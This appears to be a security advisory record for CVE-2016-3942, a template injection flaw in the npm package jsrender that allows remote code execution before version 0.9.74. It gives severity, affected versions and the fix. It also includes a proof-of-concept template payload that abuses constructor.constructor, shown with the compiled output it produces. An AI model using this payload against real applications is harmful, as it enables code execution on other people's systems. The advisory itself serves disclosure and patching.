GHSA-r87w-47m8-22w3

Source

https://github.com/advisories/GHSA-r87w-47m8-22w3

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-r87w-47m8-22w3/GHSA-r87w-47m8-22w3.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-r87w-47m8-22w3

Aliases

CVE-2016-3942

Published

2020-09-01T15:24:24Z

Modified

2023-11-08T03:58:27.633161Z

Severity

6.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L CVSS Calculator

Summary

Template Injection in jsrender

Details

Affected versions of jsrender are susceptible to a remote code execution vulnerability when used with server delivered client-side tempates which dynamically embed user input.

Proof of Concept

//POC-REQUEST
{{for ~x!=1?(constructor.constructor("return arguments.callee.caller")()):~y(10)}}
{{:#data}}
{{/for}}

//POC-RESPONSE
function anonymous(data,view,j,u) { // template var v,t=j._tag,ret="" +t("for",view,this,[ {view:view,tmpl:1, params:{args:['~x!=1?(constructor.constructor(\"return arguments.callee.caller\")()):~y(10)']}, args:[view.hlp("x")!=1?(data.constructor.constructor("return arguments.callee.caller")()):view.hlp("y")(10)], props:{}}]); return ret; }

Recommendation

Update to version 0.9.74 or later.

Database specific

{
    "github_reviewed_at": "2020-08-31T18:10:44Z",
    "cwe_ids": [
        "CWE-94"
    ],
    "nvd_published_at": null,
    "severity": "MODERATE",
    "github_reviewed": true
}

References

Affected packages

npm / jsrender

Package

Name: jsrender; View open source insights on deps.dev
Purl: pkg:npm/jsrender

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

0.9.74

Database specific

{
    "last_known_affected_version_range": "<= 0.9.73"
}